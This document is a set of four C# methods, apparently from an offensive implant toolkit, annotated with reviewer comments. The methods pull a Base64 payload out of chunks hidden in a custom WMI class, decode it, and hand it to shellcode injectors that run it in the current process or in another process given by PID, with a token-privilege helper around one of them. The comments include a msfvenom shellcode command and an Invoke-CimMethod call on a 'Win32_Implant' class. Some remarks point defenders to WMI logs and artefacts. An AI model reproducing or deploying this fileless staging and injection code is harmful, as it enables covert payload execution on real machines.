Example #1
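        /// <summary>
        /// Fetches a payload through <c>Misc.QueryWMIFS</c>, decodes the returned bytes as UTF-16
        /// text, and passes that string to <c>InjectShellCode</c> (no PID given) or
        /// <c>InjectShellCodeRemote</c> (PID given).
        /// </summary>
        /// <param name="processId">Decimal PID as text; null or empty selects the <c>InjectShellCode</c> path.</param>
        /// <param name="wmiClass">Passed unchanged to <c>Misc.QueryWMIFS</c>.</param>
        /// <param name="fileName">Passed unchanged to <c>Misc.QueryWMIFS</c>.</param>
        /// <remarks>
        /// Reviewer context: <c>Misc.QueryWMIFS</c>, <c>InjectShellCode</c>, <c>InjectShellCodeRemote</c>
        /// and <c>Tokens</c> are not shown here. Going by the names, the payload is presumably read from a
        /// WMI class rather than from a file on disk and then executed in the current or another process.
        /// For defenders, the observable parts are the WMI queries (Microsoft-Windows-WMI-Activity/Operational
        /// log) and whatever cross-process memory and thread activity the injector performs.
        /// Despite the "B64" suffix, no Base64 decoding happens in this method; if any is done, it is
        /// inside <c>Misc.QueryWMIFS</c>.
        /// </remarks>
        public static void InjectShellCodeWMIFSB64(String processId, String wmiClass, String fileName)
        {
            Byte[] peBytes         = Misc.QueryWMIFS(wmiClass, fileName);
            // The stored bytes are interpreted as UTF-16LE text, not used as raw bytes.
            String shellCodeString = System.Text.Encoding.Unicode.GetString(peBytes);

            Int32 dwProcessId = 0;

            if (String.IsNullOrEmpty(processId))
            {
                using (var injectShellCode = new InjectShellCode(shellCodeString))
                {
                    injectShellCode.Execute();
                }
            }
            // Int32.TryParse accepts negative text such as "-4"; in an unchecked context the cast
            // below would wrap it to 4294967292. Negative values are routed to the error branch.
            else if (Int32.TryParse(processId, out dwProcessId) && dwProcessId >= 0)
            {
                using (var injectShellCodeRemote = new InjectShellCodeRemote(shellCodeString, (UInt32)dwProcessId))
                {
                    // tokens is never referenced; it is only held open around Execute().
                    // NOTE(review): presumably its constructor/Dispose change token privileges - confirm against Tokens.
                    using (var tokens = new Tokens())
                    {
                        injectShellCodeRemote.Execute();
                    }
                }
            }
            else
            {
                // Reached when processId is non-empty but not a non-negative Int32.
                Console.WriteLine("Unknown Error");
            }
        }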
Example #2
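        /// <summary>
        /// Reassembles a Base64 payload stored as indexed chunks in the <c>WMIFS</c> WMI class under
        /// <c>root\cimv2</c>, decodes it, and passes the resulting string to <c>InjectShellCodeRemote</c>.
        /// </summary>
        /// <param name="wmiClass">Not used by this method; the queries name the <c>WMIFS</c> class directly.</param>
        /// <param name="fileName">Value matched against the <c>FileName</c> property; it is concatenated into the WQL text unescaped.</param>
        /// <param name="processId">Target PID; cast to <c>UInt32</c> without a range check.</param>
        /// <returns>The value returned by <c>InjectShellCodeRemote.GetOutput()</c>.</returns>
        /// <remarks>
        /// Reviewer context: the payload lives in the WMI repository rather than in a file, split across
        /// instances keyed by <c>FileName</c> and <c>Index</c>. For defenders, an unexpected class holding
        /// long Base64 strings in <c>root\cimv2</c>, and the queries against it
        /// (Microsoft-Windows-WMI-Activity/Operational log), are the artefacts worth auditing.
        /// <c>InjectShellCodeRemote</c> is not shown here.
        /// </remarks>
        public static string InjectShellCodeWMIFSB64(string wmiClass, string fileName, Int32 processId)
        {
            //msfvenom -p windows/x64/exec --format csharp CMD=calc.exe
            //Invoke-CimMethod -Class Win32_Implant -Name InjectShellCodeRemote -Argument @{shellCodeString=$payload; processId=[UInt32]432}
            ConnectionOptions options = new ConnectionOptions();

            options.Impersonation = System.Management.ImpersonationLevel.Impersonate;
            ManagementScope scope = new ManagementScope("\\\\.\\root\\cimv2", options);

            scope.Connect();

            // NOTE(review): fileName is spliced into the WQL text as-is, so a quote or backslash in it
            // changes the query. Callers must pass a trusted, already-escaped value.
            ObjectQuery queryIndexCount = new ObjectQuery("SELECT Index FROM WMIFS WHERE FileName = \'" + fileName + "\'");
            int indexCount;

            // The searcher and its result collection are IDisposable; release them deterministically.
            using (ManagementObjectSearcher searcherIndexCount = new ManagementObjectSearcher(scope, queryIndexCount))
            using (ManagementObjectCollection queryIndexCollection = searcherIndexCount.Get())
            {
                indexCount = queryIndexCollection.Count;
            }

            // StringBuilder avoids re-copying the accumulated text for every chunk.
            System.Text.StringBuilder encodedText = new System.Text.StringBuilder();

            // Assumes chunk indexes are contiguous from 0 to indexCount - 1; a gap silently drops data.
            for (int i = 0; i < indexCount; i++)
            {
                ObjectQuery queryFilePart = new ObjectQuery("SELECT FileStore FROM WMIFS WHERE FileName = \'" + fileName + "\' AND Index = \'" + i + "\'");

                using (ManagementObjectSearcher searcherFilePart = new ManagementObjectSearcher(scope, queryFilePart))
                using (ManagementObjectCollection queryCollection = searcherFilePart.Get())
                {
                    foreach (ManagementObject filePart in queryCollection)
                    {
                        using (filePart)
                        {
                            encodedText.Append(filePart["FileStore"].ToString());
                        }
                    }
                }
            }

            // FromBase64String throws FormatException when the reassembled text is not valid Base64.
            byte[] peBytes         = System.Convert.FromBase64String(encodedText.ToString());
            // The decoded bytes are interpreted as UTF-16LE text, not used as raw bytes.
            String shellCodeString = System.Text.Encoding.Unicode.GetString(peBytes);

            // NOTE(review): a negative processId wraps to a large value in an unchecked context.
            // The instance is not disposed here; whether GetOutput() needs it alive is not visible - confirm.
            InjectShellCodeRemote injectShellCodeRemote = new InjectShellCodeRemote(shellCodeString, (UInt32)processId);

            return(injectShellCodeRemote.GetOutput());
        }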
Example #3
        //msfvenom -p windows/x64/exec --format csharp CMD=calc.exe
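        /// <summary>
        /// Passes <paramref name="shellCodeString"/> to <c>InjectShellCode</c> when no PID is given,
        /// or to <c>InjectShellCodeRemote</c> when <paramref name="strProcessId"/> parses as a PID.
        /// </summary>
        /// <param name="strProcessId">Decimal PID as text; null or empty selects the <c>InjectShellCode</c> path.</param>
        /// <param name="shellCodeString">Payload string handed unchanged to the injector type.</param>
        /// <remarks>
        /// Reviewer context: <c>InjectShellCode</c>, <c>InjectShellCodeRemote</c> and <c>Tokens</c> are not
        /// shown here, so what <c>Execute()</c> does is only implied by the names. The caller-supplied
        /// payload is not validated in this method.
        /// </remarks>
        public static void InjectShellCode(String strProcessId, String shellCodeString)
        {
            Int32 dwProcessId = 0;

            if (String.IsNullOrEmpty(strProcessId))
            {
                using (var injectShellCode = new InjectShellCode(shellCodeString))
                {
                    injectShellCode.Execute();
                }
            }
            // Int32.TryParse accepts negative text such as "-4"; in an unchecked context the cast
            // below would wrap it to 4294967292. Negative values are routed to the error branch.
            else if (Int32.TryParse(strProcessId, out dwProcessId) && dwProcessId >= 0)
            {
                using (var injectShellCodeRemote = new InjectShellCodeRemote(shellCodeString, (UInt32)dwProcessId))
                {
                    // tokens is never referenced; it is only held open around Execute().
                    // NOTE(review): presumably its constructor/Dispose change token privileges - confirm against Tokens.
                    using (var tokens = new Tokens())
                    {
                        injectShellCodeRemote.Execute();
                    }
                }
            }
            else
            {
                // Reached when strProcessId is non-empty but not a non-negative Int32.
                Console.WriteLine("Unknown Error");
            }
        }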
Example #4
        /// <summary>
        /// Thin wrapper: constructs an <c>InjectShellCodeRemote</c> from the supplied payload string
        /// and PID, then returns whatever its <c>GetOutput()</c> reports.
        /// </summary>
        /// <param name="shellCodeString">Payload string passed unchanged to <c>InjectShellCodeRemote</c>.</param>
        /// <param name="processId">Target PID; cast to <c>UInt32</c> with no range check.</param>
        /// <returns>The string returned by <c>InjectShellCodeRemote.GetOutput()</c>.</returns>
        /// <remarks>
        /// Reviewer context: <c>InjectShellCodeRemote</c> is not shown here. <c>Execute()</c> is never
        /// called in this method, so any work happens in the constructor or in <c>GetOutput()</c>.
        /// The Invoke-CimMethod comment below indicates this is meant to be reachable as a WMI method.
        /// </remarks>
        public static string InjectShellCode(string shellCodeString, Int32 processId)
        {
            //msfvenom -p windows/x64/exec --format csharp CMD=calc.exe
            //Invoke-CimMethod -Class Win32_Implant -Name InjectShellCodeRemote -Argument @{shellCodeString=$payload; processId=[UInt32]432}

            // NOTE(review): a negative processId wraps to a large value in an unchecked context.
            UInt32 targetPid = (UInt32)processId;
            InjectShellCodeRemote remoteInjector = new InjectShellCodeRemote(shellCodeString, targetPid);

            string output = remoteInjector.GetOutput();
            return output;
        }